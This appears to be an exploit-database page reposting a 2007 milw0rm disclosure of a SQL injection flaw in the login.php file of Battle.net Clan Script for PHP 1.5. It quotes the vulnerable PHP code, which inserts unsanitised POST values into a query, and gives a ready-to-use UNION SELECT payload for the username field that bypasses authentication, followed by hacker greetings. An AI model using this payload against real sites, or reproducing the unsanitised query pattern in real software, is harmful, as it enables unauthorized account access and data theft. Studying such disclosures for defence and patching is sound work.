logo
DATABASE RESOURCES PRICING ABOUT US

Battle.net Clan Script for PHP 1.5.1 Remote SQL Injection Vulnerability

Description

**************************************** script : Battle.net Clan Script 1.5 file : login.php attack : injection sql auteur : h a c k e r _ X *************************************** code : ------------------------------------------------------------------------------------------ line 9 --> $user = $_POST['user']; line 10--> $pass = $_POST['pass']; ..... ..... ..... line 21--> mysql_query("SELECT * FROM bcs_members WHERE name='$user' AND password='$pass'", $link); ******* ------------------------------------------------------------------------------------------------- exploit : ******* Username : ' union select 0,0,0,0,0,0,0,0,0,0,0 from bcs_members/* password : enything ************************************************** * thinks to : max007,simo64,brutalism and all marocains hackers special thinks for "P Y N S S O" ************************************************** * # milw0rm.com [2007-04-09]